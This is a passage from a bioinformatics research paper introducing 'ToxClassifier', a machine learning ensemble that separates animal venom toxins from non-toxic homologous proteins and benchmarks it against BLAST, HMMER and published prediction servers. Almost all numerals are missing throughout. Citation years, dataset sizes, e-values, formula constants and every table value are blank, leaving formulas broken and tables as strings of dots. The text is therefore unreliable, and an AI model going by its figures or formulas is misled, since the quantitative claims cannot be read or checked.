proteins with non-toxic physiological functions, and deciphering sequence data to disentangle these functions is not a trivial task (kaas & craik, ). previous proteomic data from our laboratory and subsequent results of others realised an astonishingly high sequence similarity between cnidarian (jellyfish, coral, sea anemones etc.) toxins and those of other higher venomous animals (weston et al., ; weston et al., ; li et al., ; li et al., ). this suggested to us that a small number of sequences, when occurring in combination, might explain this similarity and prompted the search for toxin-specific motifs (starcevic & long, ). an unsupervised procedure was developed that resulted in the identification of motifs we called ‘tox-bits’, and which could describe most toxins as combinations of between – ‘tox-bits’ (starcevic et al., ). the ‘tox-bits’ are defined as hmm-profiles and were found to be superior at differentiating toxin from non-toxin sequences, when compared against standard blast or hmm based methods (starcevic et al., ). however, implementation of ‘tox-bits’ hmm profiles is not straightforward for scientists with little or no bioinformatics experience. hence, in this paper we introduce and make freely available an easy-to-use machine learning tool called the ‘toxclassifier’ that employs ‘tox-bits’ hmm profiles and other standard classifier tools running in parallel to distinguish toxins from their non-toxic homologues. methods datasets data for training and testing of machine learning classifiers used in toxclassifier ensemble was obtained from uniprotkb database (bateman et al., ), according to the following methodology: gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ( ) ‘positive’ dataset representing well annotated putative animal toxins was downloaded from uniprotkb/swissprot-toxprot (jungo et al., ). database was searched for animal toxins and venoms, using search query: taxonomy: ‘‘metazoa [ ]’’ (keyword:toxin or annotation:(type: ‘‘tissue specificity’’ venom)). all duplicate entries with identical sequence or sequence identifier were removed, resulting in , sequences. ( ) ‘easy’ negative dataset representative of physiological proteins was obtained by random sampling of , sequences in uniprotkb/swissprot database (bateman et al., ). all entries with duplicate sequence identifier or protein sequence were removed, as were all entries also occuring in positive dataset; final dataset included , protein sequences. ( ) ‘moderate difficulty’ negative dataset was designed to match highly curated toxin- like proteins with physiological function; it was created by blastp searching uniprotkb/swissprot database with positive dataset, with e-value cutoff of . e– . resulting blastp hits were collected and all duplicates (with identical sequence or sequence identifier), and all sequences also present in positive dataset or easy dataset were removed, resulting in , proteins. ( ) ‘hard’ negative dataset was constructed from trembl database (bairoch & apweiler, ) instead of swiss-prot. as with moderate dataset, it was created from results of blastp using positive dataset as query and trembl as target database. duplicates and sequences also occurring in positive, easy or moderate datasets were removed for total of , sequences. all datasets are available for download at https://github.com/rgacesa/toxclassifier/tree/ master/datasets. machine learning classifiers, training and testing models describing protein sequences were constructed as follows: ( ) single amino acid frequency model (of): model uses length of sequence and frequency of each amino acid as input features. ( ) amino acid dimer frequency model (bif): model uses length of sequence, frequency of each amino acid and of each amino acid -mer. ( ) naive tox-bits model (ntb): input features for this model are the number of ‘tox-bits’ for each ‘tox-bits’ hmm listed in the ‘tox-bits’ database (starcevic et al., ). ( ) scored ‘tox-bits’ model (stb): stb is a modification of the ntb model, with hmm bit-scores replacing the number of ‘tox-bits’ in each ‘tox-bit’ hmm model. ( ) tri-blast simple (tbs) model: tbs uses blastp searches against positive (uniprotkb/swissprot-toxprot) and two negative control databases (close non-toxins from uniprotkb/swissprot and non-toxins from trembl); features include bit-score, query length, subject length, query/subject length ratio, query coverage, percentage of iden- tity, percentage of positive matches; features also include amino-acid frequencies. scores are computed from the ‘best-hit’ in each database, with a blast e-value of . e– . ( ) tri-blast enhanced a (tbea) model: tbea model is an expanded variant of tbs, with amino dimer frequencies included in the model. gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rgacesa/toxclassifier/tree/master/datasets https://github.com/rgacesa/toxclassifier/tree/master/datasets http://dx.doi.org/ . /peerj-cs. ( ) tri-blast enhanced b (tbeb): model is a variation of tbea, trained on % of the input dataset and with a blast e-value cut-off value of . e+ for the detection of similar toxin or non-toxic sequences. feature extraction and vectorisation was implemented using the python . (https://www.python.org/download/releases/ . /) scripting language, ncbi blast+ version . . (camacho et al., ), hmmer . b (eddy, ), the ‘tox-bit’ hmm profile database (starcevic et al., ) and a set of custom blast databases based on uniprotkb/swissprot-toxprot, uniprotkb/swissprot and trembl databases. vectorization scripts, vectorised data sets and trained models are available for download at https://github.com/rgacesa/toxclassifier. support vector machine (svm), gradient boosted machine (gbm) and generalised linear model (glm) classifiers were trained for each of the models; classifiers were implemented using the r-programming language, caret package (http://topepo.github.io/ caret/index.html). the training set for each dataset was selected by random sampling of % of the sequences, and combined training sets were used to train the classifiers. input features were -centered and scaled by standard deviation and training was performed with internal bootstraps. learning curves were constructed for each classifier to evaluate training efficiency and potential overtraining by plotting performance versus number of sequences in training set. classifiers were tested using those sequences from positive, easy, moderate and hard datasets not used in training. performance was evaluated on each of the datasets and on the summary dataset. the following performance measurements were calculated: ( ) number of true positives (tp): number of toxic sequences in dataset correctly predicted as toxins; sequence was considered a toxin if listed in uniprotkb/toxprot database. ( ) number of true negatives (tn): number of non-toxic sequences in dataset which are correctly predicted as non-toxic (not in uniprotkb/toxprot database). ( ) number of false positive (fp): number of non-toxic sequences in dataset incorrectly classified as toxins. ( ) number of false negatives (fn): number of toxic sequences in dataset incorrectly classified as non-toxic. ( ) accuracy (acc): accuracy is calculated as proportion of sequences correctly classified as toxins or non-toxins; acc = (tp + tn) / (tp + tn + fp + fn). ( ) specificity (spec): also called true negative rate, specificity is proportion of correctly predicted non-toxins (true negatives); spec = tn / (tn + fp). ( ) sensitivity (sens): also called true positive rate or recall, sensitivity is proportion of correctly predicted toxins (true positives); sens = tp/(tp + fn). ( ) balanced accuracy (b.acc): balanced accuracy is a mean value of specificity and sensitivity; bacc = (spec + sens)/ . ( ) negative predictive value (npv): proportion of negatives that are true negatives. npv = tn/(tn + fn). ( ) positive predictive value (ppv): also called precision, ppv measures proportion of positives which are true positives; ppv = tp/(tp + fp). gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.python.org/download/releases/ . / https://github.com/rgacesa/toxclassifier http://topepo.github.io/caret/index.html http://topepo.github.io/caret/index.html http://dx.doi.org/ . /peerj-cs. ( ) f-score (f ): f-score is harmonic mean of precision and sensitivity and represents weighted average of precision and recall. it is calculated as f = ∗tp/( ∗tp+ fp+fn). ( ) matthews’ correlation coefficient (mcc): the mcc value (also known as phi- coefficient) is a measure of correlation between observed and predicted. it is considered balanced measure even for classes with different amounts of positive and negative values; mcc= tp∗tn−fp∗fn√ (tp+fp)∗(tp+fn)∗(tn+fp)∗(tn+fn) (matthews, ; powers, ). conventional annotation models annotation models simulating manual annotation were constructed based on blast and hmmer, as follows: ( ) naive-blast: annotation method is based on the assumption that a sequence is a toxin if a blast search against the uniprotkb/swissprot-toxprot dataset returns a positive hit at a certain e-value (usually between . e– and . e– ). this approach and its variations are commonly encountered in the literature (sher & zlotkin, ; schwartz et al., ; liu et al., ; whittington et al., ). ( ) oneblast: this approach classifies a sequence by a single blast search against databases including uniprotkb/swissprot-toxprot and other ‘toxin-like’ but non-toxic sequences extracted from uniprotkb/swissprot and trembl databases (combination of positive, moderate and hard datasets). a sequence is classified as a putative toxin if the highest scoring blast hit at a selected e-value is from uniprotkb/swissprot-toxprot; it is classified as non-toxic if top blast hit is not from uniprotkb/swissprot-toxprot, or if all blast hits are above the selected e-value. ( ) triblast: annotation is performed by a variation of oneblast, using separate blast searches against uniprotkb/swissprot-toxprot and two non-toxin databases (for the moderate and hard datasets); a sequence is classified as a toxin if the blast search against uniprotkb/swissprot-toxprot returns a hit below a certain e-value and with a higher score than the searches against the other databases. variations of this method are commonly used in toxin annotation (gacesa et al., ; rachamim et al., ). ( ) hmmertoxbits: this method is a variation of the naive-blast, using hmmer package hmmsearch instead of blast, and the database of ‘tox-bits’ hmm models as the target database. a sequence is classified as a toxin if one or more hmms can be detected within a certain e-value cut-off. ( ) hmmervenom: modification of hmmertoxbits, the method uses hmm profiles extracted by ‘venom’ and ‘toxin’ text search of the pfam database instead of ‘tox-bit’ hmms. ( ) twinhmmerpfam: a hmmer based variant of triblast approach, this method performs hmmsearches against two hmm databases (toxin/positive hmms and negative control) and compares bitscores. sequence is annotated as a toxin if bitscore for toxin hmm database is higher. twinhmmerpfam toxin hmms were extracted from pfam by keyword search for ‘toxin’ and ‘venom,’ while negative control database is comprised from remainder of pfam. gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ( ) twinhmmertoxbits: a variation of twinhmmerpfam method, method compares hmmsearch against toxin hmms and negative control. for this model, positive database is composed from ‘tox-bit’ hmms derived from tox-prot toxins (starcevic et al., ), while negative control is pfam database from which hmms containing ‘toxin’ or ‘venom’ keywords were removed. blast databases for naive-blast, oneblast and triblast were constructed from % randomly sampled sequences in positive, easy, moderate and hard and performance was measured by annotating remainder of data. hmmer based methods were tested with % of random sequences from input datasets, using all appropriate hmm models. database construction and testing was repeated times and results were averaged. toxclassifier meta-classifier calibration and testing toxclassifier meta-classifier was constructed from nine annotation model and classifier combinations (bif_svm, bif_gbm, stb_svm, stb_gbm, tbs_svm, tbs_svm, tbea_svm, tbeb_svm and tbeb_gbm). each of nine classifiers reports if the input sequence is predicted as toxin or if predicted as non-toxic, for final prediction score of to . datasets used for calibration of meta-classifier were chosen from the set of venomous and non-venomous animals (human homo sapiens, the house mouse mus musculus, the burmese python python bivittatus, king cobra ophiophagus hannah, the duck-billed platypus ornithorhynchus anatinus, the snakelocks sea anemone anemonia viridis, the starlet sea anemone nematostella vectensis; and all proteins deposited in the uniprotkb/swissprot and trembl databases attributed to snakes, spiders, wasps and conus snails). all sequences were downloaded from uniprotkb database with exception of python bivittatus which was not available in uniprotkb and was downloaded from ncbi protein database (wheeler et al., ); all data is available at https://github.com/rgacesa/toxclassifier/tree/master/datasets. datasets were split into training sets consisting of % of data and test sets including remaining % of sequences. toxclassifier meta-classifier was calibrated by evaluating prediction score versus per- formance for each animal training set and for summary dataset constructed by combining animal training datasets with exclusion of conus snail data, which was dropped due to sus- pected low quality of annotation. calibrated toxclassifier, with prediction score or more as cut-off for positive classification, was tested on animal data test sets, and performance measures were compared to oneblast, naiveblast models and clantox server. data used for training and testing and all calculated performance metrics are available at https: //github.com/rgacesa/toxclassifier/tree/master/datasets/toxclassifier_calibration_test. toxclassifier comparison to other published tools performance of clantox server (kaplan, morpurgo & linial, ) was tested on positive, easy, moderate and hard datasets and on animal data test sets. toxinpred server (gupta et al., ) was tested on positive dataset sequences of length up to amino acids (toxinpred sequence length limit) and on negative dataset composed amino acid or shorter protein sequences randomly selected from uniprot database ( , non-duplicate, non-toxprot sequences). toxinpred was not tested on animal data due to lack of short gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rgacesa/toxclassifier/tree/master/datasets https://github.com/rgacesa/toxclassifier/tree/master/datasets/toxclassifier_calibration_test https://github.com/rgacesa/toxclassifier/tree/master/datasets/toxclassifier_calibration_test http://dx.doi.org/ . /peerj-cs. sequences available in these datasets. spiderp server (wong et al., ) was not tested as service was not available at the time and predcsf server (fan et al., ) was not tested as it was deemed too specialized and only accepts single sequence as input. user interface the toxclassifier web service front-end is implemented using html . (https://www. w .org/html/), javascript (https://www.javascript.com/), jquery (https://jquery.com/), css (https://www.w .org/style/css/), java . (https://www.oracle.com/java/index.html) and the java server pages (jsp . ) framework (http://www.oracle.com/technetwork/java/ javaee/jsp/index.html). visualisation is performed using r (https://www.r-project.org/), ggplot (http://ggplot .org/) and r markdown (http://rmarkdown.rstudio.com/) packages. toxclassifier runs on an apache tomcat . web server (http://tomcat.apache.org/ download- .cgi), under an ubuntu linux . operating system (http://www. ubuntu.com/). the service is hosted by the section of bioinformatics, faculty of food technology and biotechnology, university of zagreb, croatia (http://www.pbf.unizg.hr/ en/departments/department_of_biochemical_engineering/section_for_bioinformatics). results the accuracy of three individual machine-learning classifiers to predict toxins from proteins having other physiological functions was assessed by training each classifier using seven different annotation models. the learning classifiers were a support vector machine (svm) and gradient boosted machine (gbm) chosen as high-performing predictors, and a generalised linear model (glm) regarded as a simple classifier, but with which a baseline could be established that would allow comparison of the performance of the svm and gbm machines. a detailed description of the annotation models is given in ‘methods’ section, but briefly the annotation models used the following sequence information from the training set as classifier inputs: either the frequency of amino acids (tbsim) or combinations of two amino-acids (bif), the presence of absence or ‘tox-bits’ (stoxa), hmm scores for ‘tox-bits’ (stoxb), a selection of blast output co-variants (tbea) or a variation on tbsim and tbea (tbeb). the training set was constructed by merging % of arbitrarily selected sequences from each of the following datasets: / a ‘positive’ dataset that contained all , protein sequences deposited in the uniprotkb/swissprot-toxprot database of animal venom toxins (jungo et al., ). / an ‘easy’ dataset composed of , random, non-duplicate sequences from uniprotkb/swissprot database (bateman et al., ). / a ‘moderate’ dataset comprised of , unique sequences from the manually curated uniprotkb/swissprot database considered to be non-toxic but with homology to toxin proteins in uniprotkb/swissprot-toxprot. / a ‘hard’ dataset that included , non- duplicate sequences extracted from the computer annotated trembl (bairoch & apweiler, ) database, also considered to be non-toxic but with homology to animal venom toxins in uniprotkb/swissprot-toxprot. all training was performed using internal bootstrap cross-validations on the training set, and learning curves showing the accuracy of predictions versus the number of sequences gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/html/ https://www.w .org/html/ https://www.javascript.com/ https://jquery.com/ https://www.w .org/style/css/ https://www.oracle.com/java/index.html http://www.oracle.com/technetwork/java/javaee/jsp/index.html http://www.oracle.com/technetwork/java/javaee/jsp/index.html https://www.r-project.org/ http://ggplot .org/ http://rmarkdown.rstudio.com/ http://tomcat.apache.org/download- .cgi http://tomcat.apache.org/download- .cgi http://www.ubuntu.com/ http://www.ubuntu.com/ http://www.pbf.unizg.hr/en/departments/department_of_biochemical_engineering/section_for_bioinformatics http://www.pbf.unizg.hr/en/departments/department_of_biochemical_engineering/section_for_bioinformatics http://dx.doi.org/ . /peerj-cs. in the training sets were constructed, thereby allowing a comparative evaluation of training efficiency (fig. s ). the trained classifiers were then tested for prediction accuracy using the remaining % of sequences not included in the training set. performance values were calculated to give an overall comparative classification of protein sequences as toxins or non-toxins (table ). by comparing learning curves (fig. s ) and accuracy of predictions (table ), of the annotation model and classifier combinations were chosen to construct the ‘toxclassifier’ ensemble. the trained classifiers were: bif_svm, bif_gbm, stb_svm, stb_gbm, tbs_svm, tbs_svm, tbea_svm, tbeb_svm and tbeb_gbm. these classifiers all gave excellent accuracy scores to predict toxins from the positive dataset (range . – . ) and non-toxin proteins from the easy, moderate and hard datasets (range . – . ). no glm classifiers were included in the ensemble because prediction accuracies were considerably lower when compared with svm and gbm machines. classifiers using ntb and of annotation models were also abandoned in favour of better performing stb and bif models. furthermore, the tbea_gbm model consistently underperformed compared to the tbe_svm model and was excluded, giving an odd number of classifiers in the ensemble, thereby avoiding a ‘tied vote’ scenario when the outputs were interpreted collectively. the prediction accuracy of the trained machine learning classifiers was next compared to more conventional annotation methods based on sequence alignment, to determine if machine learning predictions were superior or inferior to well established and accepted bioinformatics tools. a detailed description of the annotation models based on these bioinformatics tools is given in ‘methods.’ briefly, simple predictions were made by taking the best-hit from blast comparisons between a query sequence and the uniprotkb/swissprot-toxprot database (naiveblast method), or the best-hit following a hmmer hmmsearch comparison between a query sequence and either existing hmm models for toxin protein families in the pfam database (hmmervenom model), or our own ‘tox-bits’ hmm models (hmmertoxbits classifier). more sophisticated annotation models also used blast or hmmer searches, but the best-hit was extracted following simultaneous comparisons between the query sequence and multiple datasets. these sophisticated annotation models are also described in ‘methods’, but briefly these models were constructed from sequence information extracted from either uniprotkb/swissprot- toxprot sequences supplemented with additional toxin-like sequences from the uniprotkb/swissprot and trembl databases, or uniprotkb/swissprot-toxprot sequences supplemented with non-toxin sequences from the ‘moderate’ and ‘hard’ datasets used to train the machine classifiers. training and test sets were analogous in design and execution to the machine classifier learning, with % of sequence information used to construct the blast and hmmer databases and the remaining % of data used to evaluate performance. prediction accuracy measures for each query sequence using each of the bioinformatics models were repeated times to give a final balanced accuracy value. accuracy measure calculations are described in ‘methods’. a range of sequence-alignment scoring was also tested to select the lowest blast and hmmer cut-off scores that gave the most precise toxin annotation. this value was . e- for both blast and hmmer searches (fig. s ). gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table prediction accuracy on positive and negative datasets, as well as range of measurements calculated for all test data, and described in detail in ‘methods.’ an- notation models used as classifier inputs either: the frequency of amino acids (tbsim) or combinations of two amino-acids (bif); the presence of absence or ‘tox-bits’ (stoxa); hmm scores for ‘toxbits’ (stoxb); a selection of blast output co-variants (tbea); a variation on tbsim and tbea (tbeb). classifier learning machines used were: gradient boosted (gbm), support vector (svm) and generalised linear model (glm). the datasets were a ‘positive’ control containing only validated animal tox- ins, an ‘easy’ dataset composed of non-toxin sequences, a ‘moderate’ dataset comprising curated non-toxin sequences but with homology to ‘positive’ sequences, and a ‘hard’ dataset that included all sequences from the ‘moderate’ dataset, together with un-curated sequences also with homology to ‘positive’ sequences. classification scores for: test set summary annotation model classifier accuracy (positive toxin dataset) accuracy (easy non-toxin dataset) accuracy (moderate non-toxin dataset) accuracy (hard non-toxin dataset) ppv npv sens. spec. f -value mcc gbm . . . . . . . . . . svm . . . . . . . . . . tbsim glm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . bif glm . . . . . . . . . . gvm . . . . . . . . . . stoxa svm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . stoxb glm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . tbea glm . . . . . . . . . . gbm . . . . . . . . . . svm . . . . . . . . . . tbeb glm . . . . . . . . . . g acesa etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. machine learning classifiers were also evaluated against currently available published tools for toxin prediction and annotation; animal toxin prediction server clantox (kaplan, morpurgo & linial, ) was benchmarked using positive, east, moderate and hard datasets and summary of these datasets. as toxinpred (gupta et al., ) tools predict only small peptide toxins, it was tested using a subset of positive dataset with sequences no longer than amino acids ( sequences) and separate negative dataset composed of , random short proteins from uniprotkb database. spiderp (wong et al., ) was not benchmarked as the server no longer seems publically available. finally, predcsf (fan et al., ) is a conotoxin-specific tool and was deemed not comparable to general annotation tools; it also only allows single sequence input, making it unsuitable for large scale testing. final performance measures compared between the different tools are listed in table . testing of sequence-alignment based annotation models (table ) demonstrated that the simplistic methods (naiveblast, hmmertoxbits and hmmervenom) gave high prediction accuracies for sequences in the easy dataset (ranging from . for hmmervenom to . for naiveblast), but underperformed in annotation of the physiological toxin-like sequences in the moderate and hard datasets (accuracies ranging from . to . for moderate and . to . for hard dataset (the poor performance here, also evinced by the low f and mcc scores)). more sophisticated blast-based methods (oneblast and triblast) gave very high prediction accuracy scores ( . – . ) for sequences in the easy and moderate datasets, but somewhat lower performance on sequences in the positive and hard datasets ( . – . ). pfam-based twinhmmer gave the highest accuracy prediction for non-toxin sequences, but underperformed compared to the other annotation models against sequences in the positive toxin dataset (accuracy . ). the ‘tox-bits’ based variant accurately predicted sequences in the easy and moderate datasets (accuracy . – . ), but suffered from a high false positive rate when sequences in the hard dataset were analysed (accuracy . ). when compared to machine learning-based methods, even the most accurate of the sequence alignment-based models (oneblast and triblast) were surpassed by the majority of the machine learning based classifiers, especially by tbea and tbeb models (svm and gbm variants), which gave the highest accuracy of prediction for sequences in all test datasets. all prediction methods showed higher performance for negative prediction (predicting non-toxin as non-toxin) compared to positive prediction (correctly predicting toxin as toxic), with specificity (spec) and negative prediction value (npv) significantly higher than sensitivity (sens) and positive prediction value (ppv). each of the machine learning classifiers used in the ‘toxclassifier’ ensemble gives a simple bit ( or ) value as output to predict whether the likely biological activity of the input sequence is as a toxin ( ), or has a non-toxic ( ) physiological role and scores are summed into final prediction score ranging from to . evaluation of this final prediction score was performed on test sets obtained from randomly sampling % of sequences in the published annotated genomes from a selection of venomous animals (king cobra ophiophagus hannah, the duck-billed platypus ornithorhynchus anatinus, the snakelocks sea anemone anemonia viridis, the starlet sea anemone nematostella vectensis; and all proteins deposited in the uniprotkb/swissprot and trembl databases attributed to snakes, gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance for selected annotation models and published toxin prediction tools. prediction accuracy is listed for positive and negative datasets and mea- surements are also shown for summary of all test data. toxinpred server, marked with star and displayed in italic, was tested with short protein sequences only. annota- tion models were constructed from sequence information extracted from either: blast (naiveblast), ‘tox-bits’ hmm (hmmertoxbits) or pfam hmm (hmmervenom) comparisons with the uniprotkb/swissprot-toxprot database; or blast (oneblast), ‘tox-bits’ hmm (twinhmmerpfam) or pfam hmm (twinhmmerpfam) com- parisons with the uniprotkb/swissprot-toxprot sequences supplemented with additional toxin-like sequences from the uniprotkb/swissprot and trembl databases; or blast (triblast) comparisons with the uniprotkb/swissprot-toxprot sequences supplemented with non-toxin sequences from the ‘moderate’ and ‘hard’ datasets used to train the machine classifiers. the datasets were a ‘positive’ control containing only validated animal toxins, an ‘easy’ dataset composed of non-toxin sequences, a ‘moderate’ dataset comprising curated non-toxin sequences but with homology to ‘positive’ sequences, and a ‘hard’ dataset that included all sequences from the ‘moder- ate’ dataset, together with un-curated sequences also with homology to ‘positive’ sequences. classification scores for: test set summary annotation model tool accuracy (positive toxin dataset) accuracy (easy non-toxin dataset) accuracy (moderate non-toxin dataset) accuracy (hard non-toxin dataset) ppv npv sens. spec. f -value mcc naiveblast blast . . . . . . . . . . oneblast blast . . . . . . . . . . triblast blast . . . . . . . . . . hmmertoxbits hmmer . . . . . . . . . . hmmervenom hmmer . . . . . . . . . . twinhmmerpfam hmmer . . . . . . . . . . twinhmmertoxbits hmmer . . . . . . . . . . clantox server ml . . . . . . . . . . toxinpred server* ml . . n/a n/a . . . . . . g acesa etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. spiders, wasps and conus snails) and other animals considered to be non-venomous (human homo sapiens, the house mouse mus musculus and the burmese python python bivittatus). calibration was performed by assessing the performance measures of the toxclassifier ensemble relative to prediction score; calibration curves for summary of all animal genome data are presented in fig. . when the average correct annotation of all input sequences for all genomes was calculated, a combined score from five out of the nine classifiers giving correct classification provided a good balance between the detection of toxins and the filtering of non-toxins. hence, a calibration for the toxclassifier ensemble was possible where an input sequence giving a combined score of > would be considered a likely toxin, a combined score of < would be regarded as non-toxic, while an input sequence presenting with a score or would suggest a potential toxin, but would require manual evaluation using additional tools, for example, interproscan (zdobnov & apweiler, ). performance of calibrated ‘toxclassifier’ meta-classifier was evaluated on a test set comprising % of the animal genome data not used for calibration; these results were compared to naiveblast and oneblast conventional methods and to clantox server for animal toxin prediction (kaplan, morpurgo & linial, ). performance measurements are reported in table and comparison of f -scores and mcc values across all datasets is presented in fig. ; figs. s /a and s /b. finally, the ‘toxclassifier’ was assessed in a blinded experiment that used as input a set of protein sequences derived from the venom gland transcriptome of the amazonian rain forest pit viper bothrops atrox (data s ). the sequences had been annotated using standard methods and manually inspected, with the biological activities of some also being authenticated experimentally. the results of the ‘toxclassifier’ predictions matched with the expert annotation (table ). discussion the continued decline in proteomics sequencing costs over recent years has led to an explosion in venomics data characterising the toxic peptide and protein components in many venomous animals (kaas & craik, ). however, there is currently no widely accepted and standard method for functional annotation of toxins from these data sources, leading to inconsistent estimates for the number of toxins in the venom of the same animal. for example, the venom of the duck-billed platypus ornithorhynchus anatinus has only toxins listed following manual annotation in the latest release of the uniprotkb/swissprot- toxprot database ( th may ), yet putative toxins were identified by a simple pair-wise blastp search using venom gland transcriptome sequences as input to search the uniprotkb/swissprot toxprot database (jungo et al., ). in addition to separate homology searching methods to interpret the same data, many venomics projects now also include different manual filtering steps as part of the annotation process (rachamim et al., ; gacesa et al., ), exacerbating the problem of results verification. in this study, a selection of machine learning-based classifiers implementing a range of blast and hmmer-based annotation models were trained on datasets of known toxins, protein sequences assumed to be non-toxic but with homology to known toxins, and predicted proteins encoded in the genome, transcriptome or proteome of a range of gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure calibration curves used to select final prediction scores for toxclassifier ensemble. each of performance measures, described in detail in methods, is shown for toxclassifier prediction with toxin prediction cut-off values – . dotted green line shows trends of prediction measurement with increase in toxclassifier cut-off value and final cut-off value implemented in calibrated toxclassifier is highlighted with blue line. venomous and non-venomous animals. a comparison between the results presented in tables – demonstrated that the majority of the machine learning methods consistently out-performed standard bioinformatics approaches of functional annotation. interestingly, all tested methods demonstrated higher performance for negative prediction (classification of non-toxic sequences) compared to positive classification (prediction of toxic sequences as toxins). these results demonstrate that differentiating between physiological toxin-like proteins and actual toxins is more difficult then prediction of random proteins as non-toxic, which is to be expected considering the similarity and common origin of many toxins and toxin-like sequences (fry, ; chang & duda, ; hargreaves et al., ). as such, it is important to consider balanced performance measurements when assessing toxin classifiers, with scores such as f -score and mcc value (matthews, ; powers, ) providing gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table toxclassifier calibrated meta-classifier, test set results compared to oneblast, naiveblast and clantox annotation methods. table lists comparison of classification performance for calibrated toxclassifier to blast based annotation models and clantox toxin prediction server. all tests were conducted test dataset not used in calibration of toxclassifier. classification performance of toxclassifier meta-classifier, compared to blast based methods and clantox server annotation model tool accuracy positive prediction value negative prediction value sensitivity specificity f -value mcc value naiveblast blast . . . . . . . oneblast blast . . . . . . . clantox server ml-based . . . . . . . toxclassifier ml-based . . . . . . . figure comparison between selected toxin prediction tools for all animal test datasets. calibrated toxclassifier, with positive prediction cutoff , is shown by green bar, clantox prediction server is displayed in orange, oneblast prediction performance in red and naiveblast in blue. f - value and matthews’ correlation coefficient are displayed for each of test sets and for summary of all data with exclusion of conus snail proteins. gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table results of expert manual annotation to toxclassifier annotation for set of novel proteins from venom gland transcriptome of bothrops atrox snake. sequence annotation test sample ‘toxclassifier’ standard annotation test potential toxin bpp precursor—toxin test potential toxin crisp—toxin test toxin ctl—toxin test toxin ctl—toxin test potential toxin hyaluronidase—toxin test potential toxin kunitz –like sequence—probably a toxin test toxin laao—toxin test not a toxin nucleotidase—probably not a toxin test not a toxin phosphodiesterase— probably not a toxin test toxin pla —toxin test toxin svmp class pi—toxin test toxin svmp class pii—toxin test toxin svmp class piii—toxin test toxin svsp—toxin test potential toxin vegf—toxin more appropriate measurements of performance than simple accuracy. another issue of toxin classification lies in unbalanced datasets, because most venomous animal genomes encode less than toxins and , – , physiological non-toxic proteins; as a result, even a high performing method can generate a high number of false positive predictions. for example, . % correct prediction of non-toxins results in ∼ false positive toxins for an average animal proteome, which is in fact more than the actual number of true toxins. in order to minimize both of these problems, the toxclassifier training scheme was conservative, using only well-annotated toxins from uniprotkb/toxprot database as positives, and while this might lead to a somewhat lower positive prediction rate (due to missing likely toxins which are not annotated as such), it does serve to minimise the false positive rate. notably, predictions were less accurate on some genome datasets, especially conus snail proteins, with low performance metrics observed for all tested annotation methods. this discrepancy was likely caused by the assumption that sequences deposited in the uniprotkb/swissprot-toxprot sequence are bona fide toxins, while sequences in the uniprotkb/swissprot and trembl databases without ‘toxin’ or ‘venom’ keywords are not toxins. given that toxin activity is attributed to most sequences without biological validation, it is likely that the training datasets almost certainly excluded a number of toxin sequences and included some yet unknown toxins as non-toxic. another limitation of the ‘toxclassifier’ lies in the inherent bias of the training sets; an underrepresentation in sequences from certain animal lineages, particularly the basal metazoa, e.g., cnidaria, could lead to incorrect assignment and suspicious quality of existing annotation of conotoxins is a reason to treat prediction on this protein class with caution. to elevate these problems, ‘toxclassifier’ has been designed to also report sequences suspected to gacesa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. have closest homology to underrepresented taxa as ‘suspicious toxin’ and recommends manual annotation with other tools, such as interproscan (zdobnov & apweiler, ). use of machine learning for toxin prediction has been attempted before and a range of such tools exists; however, most of the available tools are heavily specialised for toxins of specific animal origins. for example, spiderp (wong et al., ) (http: //www.arachnoserver.org/spiderp.html) is a predictor for spider toxins while toxinpred (gupta et al., ) (http://crdd.osdd.net/raghava/toxinpred/) predicts only small peptide toxins; while clantox (kaplan, morpurgo & linial, ) (http://www.clantox.cs.huji.ac. il/tech.php) was trained only on an ion-channel toxin dataset and predcsf (fan et al., ) (http://www.csbio.sjtu.edu.cn/bioinf/predcsf/) is conotoxin specific. in addition, the reported training set sizes are low (for example clantox was trained on ∼ ion channel toxins; the toxinpred toxin positive training set is , sequences, while as of th may , the uniprotkb/swissprot-toxprot database contained∼ , sequences). none of the currently available machine learning methods also gives a comparison with other currently used accepted bioinformatics annotation methods. when compared to toxclassifier and conventional annotation tools (tables and ), clantox and toxinpred tools were found to perform similar to blast based methods, while toxclassifier demonstrated higher performance across all metrics, which is likely a result of comparatively larger training sets and combination of different internal classifiers. in addition to high performance, the user interface of the ‘toxclassifier’ web service reports the best-scoring hit annotation either to uniprotkb/swissprot-toxprot (allowing placement of the toxin into the most appropriate toxin protein family), or to the best hit in uniprotkb/swissprot (giving the closest homology to a non-toxin protein). in summary, this study has established baseline prediction accuracies for a selection of toxin annotation methods and integrates these methods into an easy-to-use, high-precision, machine learning-based classification system named ‘toxclassifier.’ this tool offers a reliable and reproducible framework for toxin annotation to enable standardised toxin prediction in venomics projects and to allow for semi-automatic annotation or re-annotation of existing datasets. acknowledgements the authors are grateful to 